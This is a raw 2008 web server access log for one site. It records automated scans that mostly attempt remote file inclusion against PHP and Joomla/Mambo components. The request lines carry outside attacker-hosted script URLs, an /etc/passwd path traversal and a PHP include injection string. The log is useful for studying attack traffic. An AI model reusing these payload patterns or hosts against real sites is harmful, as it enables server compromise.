211.60.155.3 - - [07/Aug/2008:11:31:02 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:11:31:06 -0700] "GET /logs/access_080528.log//trans/trans.php?trans=&page=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:11:31:06 -0700] "GET /logs/access_080528.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:11:31:07 -0700] "GET //trans/trans.php?trans=&page=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
87.106.191.163 - - [07/Aug/2008:11:31:07 -0700] "GET /logs/access_080329.log//ashnews.php?pathtoashnews=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:11:31:07 -0700] "GET /errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:11:31:07 -0700] "GET /logs//trans/trans.php?trans=&page=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:11:31:08 -0700] "GET /logs/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
87.106.191.163 - - [07/Aug/2008:11:31:21 -0700] "GET /logs/access_080401.log//ashnews.php?pathtoashnews=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.71.178.6 - - [07/Aug/2008:11:32:29 -0700] "GET /logs/index.of.private&start=90&sa=N%22http://www.naturopathic.org/images/bulletins/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.220.208.60 - - [07/Aug/2008:11:32:31 -0700] "GET /index.of.private&start=90&sa=N%22http://www.naturopathic.org/images/bulletins/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.236.10.71 - - [07/Aug/2008:11:33:11 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://soft-5.com/Picture80?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.236.10.71 - - [07/Aug/2008:11:33:12 -0700] "GET //skin/zero_vote/error.php?dir=http://soft-5.com/Picture80?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.236.10.71 - - [07/Aug/2008:11:33:12 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://soft-5.com/Picture80?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.236.10.71 - - [07/Aug/2008:11:33:13 -0700] "GET //skin/zero_vote/error.php?dir=http://soft-5.com/Picture80?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:11:33:33 -0700] "GET /logs/access_080311.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:11:33:33 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:11:33:34 -0700] "GET /logs/access_080329.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:11:33:34 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 200 18479 "-" "libwww-perl/5.812" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:11:33:51 -0700] "GET /logs/access_080301.log//trans/trans.php?trans=&page=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:11:33:51 -0700] "GET /logs/access_080301.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
204.8.217.2 - - [07/Aug/2008:11:34:01 -0700] "GET //main.php?sayfa=http://www.almeranissan.ru/administrator/components/com_autobb/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
204.8.217.2 - - [07/Aug/2008:11:34:02 -0700] "GET /logs//main.php?sayfa=http://www.almeranissan.ru/administrator/components/com_autobb/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
63.208.74.34 - - [07/Aug/2008:11:34:39 -0700] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.208.74.34 - - [07/Aug/2008:11:34:39 -0700] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.85.102.132 - - [07/Aug/2008:11:34:55 -0700] "GET /logs/?sourcedir=http://www.geocities.com/lisnaalia/test.txt??? HTTP/1.1" 200 59568 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
213.235.247.137 - - [07/Aug/2008:11:34:55 -0700] "GET /logs/access_080113.log//errors.php?error=http://www.naturopathic.org/images/bulletins/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.235.247.137 - - [07/Aug/2008:11:34:56 -0700] "GET //errors.php?error=http://www.naturopathic.org/images/bulletins/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.102.132 - - [07/Aug/2008:11:34:56 -0700] "GET /?sourcedir=http://www.geocities.com/lisnaalia/test.txt??? HTTP/1.1" 200 18411 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
213.235.247.137 - - [07/Aug/2008:11:34:56 -0700] "GET /logs//errors.php?error=http://www.naturopathic.org/images/bulletins/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:11:35:09 -0700] "GET /logs/access_080329.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.minorleaguesportsfans.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:11:35:09 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.minorleaguesportsfans.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:11:35:09 -0700] "GET /logs/access_080329.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://futureikon.com/cache/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:11:35:09 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://futureikon.com/cache/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:11:35:09 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.minorleaguesportsfans.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:11:35:09 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://futureikon.com/cache/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:11:35:15 -0700] "GET /logs/access_080218.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://futureikon.com/cache/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:11:35:15 -0700] "GET /logs/access_080218.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.minorleaguesportsfans.com/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
212.234.12.71 - - [07/Aug/2008:11:35:29 -0700] "GET /logs/access_080124.log//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.234.12.71 - - [07/Aug/2008:11:35:30 -0700] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.234.12.71 - - [07/Aug/2008:11:35:30 -0700] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.168.106.155 - - [07/Aug/2008:11:35:38 -0700] "GET /logs/access_080127.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.italsoft.net/assistenza/za.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.235.247.137 - - [07/Aug/2008:11:35:46 -0700] "GET /logs/access_080122.log//errors.php?error=http://www.naturopathic.org/images/bulletins/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.77.184.232 - - [07/Aug/2008:11:36:29 -0700] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.77.184.232 - - [07/Aug/2008:11:36:29 -0700] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.77.184.232 - - [07/Aug/2008:11:36:51 -0700] "GET /logs/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.77.184.232 - - [07/Aug/2008:11:36:51 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://quad.net.pl/logo/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.87.132 - - [07/Aug/2008:11:36:52 -0700] "GET /logs/access_080329.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.minorleaguesportsfans.com/idN.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.22.87.132 - - [07/Aug/2008:11:36:52 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.minorleaguesportsfans.com/idN.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.22.87.132 - - [07/Aug/2008:11:36:52 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.minorleaguesportsfans.com/idN.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.22.87.132 - - [07/Aug/2008:11:36:58 -0700] "GET /logs/access_080218.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.minorleaguesportsfans.com/idN.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.234.12.71 - - [07/Aug/2008:11:37:03 -0700] "GET /logs/access_080121.log//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.50.0.218 - - [07/Aug/2008:11:37:12 -0700] "GET /logs/access_080329.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.kograko.com.pl/poll/polldata/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.50.0.218 - - [07/Aug/2008:11:37:12 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.kograko.com.pl/poll/polldata/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.50.0.218 - - [07/Aug/2008:11:37:13 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.kograko.com.pl/poll/polldata/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.50.0.218 - - [07/Aug/2008:11:37:25 -0700] "GET /logs/access_080218.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.kograko.com.pl/poll/polldata/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.224.152.230 - - [07/Aug/2008:11:37:27 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://bloggreenwood.com/v6id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.181.32.26 - - [07/Aug/2008:11:37:38 -0700] "GET /presto/ HTTP/1.1" 200 526 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.dmulk.com"
209.62.24.242 - - [07/Aug/2008:11:37:43 -0700] "GET /logs/access_080118.log/errors.php?error=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.24.242 - - [07/Aug/2008:11:37:44 -0700] "GET /errors.php?error=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.24.242 - - [07/Aug/2008:11:37:45 -0700] "GET /logs/errors.php?error=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.220.208.60 - - [07/Aug/2008:11:37:59 -0700] "GET /logs/access_080219.log/index.of.private&start=90&sa=N%22http://www.naturopathic.org/images/bulletins/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.220.208.60 - - [07/Aug/2008:11:38:00 -0700] "GET /index.of.private&start=90&sa=N%22http://www.naturopathic.org/images/bulletins/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.248.189.215 - - [07/Aug/2008:11:38:01 -0700] "GET /logs/errors.php?error=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.71.178.6 - - [07/Aug/2008:11:38:01 -0700] "GET /logs/index.of.private&start=90&sa=N%22http://www.naturopathic.org/images/bulletins/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.248.189.215 - - [07/Aug/2008:11:38:01 -0700] "GET /errors.php?error=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.119.28.109 - - [07/Aug/2008:11:38:25 -0700] "GET /logs/access_080218.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.minorleaguesportsfans.com/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.119.28.109 - - [07/Aug/2008:11:38:25 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.minorleaguesportsfans.com/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.119.28.109 - - [07/Aug/2008:11:38:25 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.minorleaguesportsfans.com/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.220.208.60 - - [07/Aug/2008:11:38:28 -0700] "GET /logs/access.log/index.of.private&start=90&sa=N%22http://www.naturopathic.org/images/bulletins/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.106.191.163 - - [07/Aug/2008:11:38:40 -0700] "GET /logs/access_080127.log//bemarket/postscript/postscript.php?p_mode=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.8.104 - - [07/Aug/2008:11:38:42 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
74.6.8.104 - - [07/Aug/2008:11:38:43 -0700] "GET /logs/access_080215.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
213.203.223.93 - - [07/Aug/2008:11:38:50 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.203.223.93 - - [07/Aug/2008:11:38:50 -0700] "GET /errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
88.168.106.155 - - [07/Aug/2008:11:38:52 -0700] "GET /logs/access_080209.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.italsoft.net/assistenza/za.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.163 - - [07/Aug/2008:11:39:01 -0700] "GET /logs/access_080404.log//bemarket/postscript/postscript.php?p_mode=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.235.247.137 - - [07/Aug/2008:11:39:29 -0700] "GET /logs//errors.php?error=http://www.naturopathic.org/images/bulletins/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.235.247.137 - - [07/Aug/2008:11:39:29 -0700] "GET //errors.php?error=http://www.naturopathic.org/images/bulletins/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.201.66 - - [07/Aug/2008:11:40:20 -0700] "GET /logs/access_080215.log//akocomments.php?mosConfig_absolute_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.226.77.5 - - [07/Aug/2008:11:40:23 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.226.77.5 - - [07/Aug/2008:11:40:24 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:11:40:56 -0700] "GET /logs/access_080528.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.25.146.28 - - [07/Aug/2008:11:40:56 -0700] "GET /logs/access_080528.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
212.50.0.218 - - [07/Aug/2008:11:41:02 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.kograko.com.pl/poll/polldata/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.62.24.242 - - [07/Aug/2008:11:41:23 -0700] "GET /logs/access_080124.log/errors.php?error=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.119.28.109 - - [07/Aug/2008:11:41:48 -0700] "GET /logs/access_080329.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.minorleaguesportsfans.com/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.84.19.133 - - [07/Aug/2008:11:41:50 -0700] "GET /logs/access_080103.log//////?mosConfig_absolute_path=http://www.geocities.com/cefill25/bot/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.84.19.133 - - [07/Aug/2008:11:41:54 -0700] "GET //////?mosConfig_absolute_path=http://www.geocities.com/cefill25/bot/safe.txt?? HTTP/1.1" 200 18453 "-" "libwww-perl/5.79" "www.dmulk.com"
91.84.19.133 - - [07/Aug/2008:11:41:55 -0700] "GET /logs//////?mosConfig_absolute_path=http://www.geocities.com/cefill25/bot/safe.txt?? HTTP/1.1" 200 59577 "-" "libwww-perl/5.79" "www.dmulk.com"
190.17.225.197 - - [07/Aug/2008:11:42:38 -0700] "GET /logs/access_080124.log HTTP/1.1" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
78.110.50.111 - - [07/Aug/2008:11:42:47 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://monjali.athost.net/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.50.0.218 - - [07/Aug/2008:11:43:01 -0700] "GET /logs/access_080215.log//akocomments.php?mosConfig_absolute_path=http://www.kograko.com.pl/poll/polldata/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.224.152.230 - - [07/Aug/2008:11:43:14 -0700] "GET /logs/errors.php?error=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.224.152.230 - - [07/Aug/2008:11:43:15 -0700] "GET /errors.php?error=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.203.223.93 - - [07/Aug/2008:11:43:42 -0700] "GET /logs/access_080309.log//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.203.223.93 - - [07/Aug/2008:11:43:42 -0700] "GET /logs/access_080309.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.203.223.93 - - [07/Aug/2008:11:43:43 -0700] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
88.168.106.155 - - [07/Aug/2008:11:43:43 -0700] "GET /logs/access_080116.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.italsoft.net/assistenza/za.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.93 - - [07/Aug/2008:11:43:43 -0700] "GET /errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.203.223.93 - - [07/Aug/2008:11:43:43 -0700] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.203.223.93 - - [07/Aug/2008:11:43:44 -0700] "GET /logs/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
70.85.102.132 - - [07/Aug/2008:11:44:03 -0700] "GET /logs/oneadmin/calendar/include.php?path[docroot]=http://www.geocities.com/lisnaalia/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
70.85.102.132 - - [07/Aug/2008:11:44:03 -0700] "GET /oneadmin/calendar/include.php?path[docroot]=http://www.geocities.com/lisnaalia/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.18.75.8 - - [07/Aug/2008:11:45:24 -0700] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://manga-scan.siteburg.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.18.75.8 - - [07/Aug/2008:11:45:25 -0700] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://manga-scan.siteburg.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.10.140.162 - - [07/Aug/2008:11:46:06 -0700] "GET /logs/access_080321.log/!scan3http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.10.140.162 - - [07/Aug/2008:11:46:06 -0700] "GET /!scan3http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.10.140.162 - - [07/Aug/2008:11:46:18 -0700] "GET /!scan3http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.88.226.121 - - [07/Aug/2008:11:47:02 -0700] "GET /logs///vwar/backup/errors.php?error=http://afe.la/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.88.226.121 - - [07/Aug/2008:11:47:02 -0700] "GET /logs/access_080219.log///vwar/backup/errors.php?error=http://afe.la/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.88.226.121 - - [07/Aug/2008:11:47:05 -0700] "GET ///vwar/backup/errors.php?error=http://afe.la/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.200.225.221 - - [07/Aug/2008:11:47:24 -0700] "GET /logs/index.php?id=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
74.200.225.221 - - [07/Aug/2008:11:47:24 -0700] "GET /index.php?id=/../../../../../../../../etc/passwd HTTP/1.1" 200 18401 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
70.88.226.121 - - [07/Aug/2008:11:47:35 -0700] "GET /logs/access_080218.log///vwar/backup/errors.php?error=http://afe.la/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.84.19.133 - - [07/Aug/2008:11:47:59 -0700] "GET /logs/access_080102.log//////?mosConfig_absolute_path=http://www.geocities.com/cefill25/bot/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
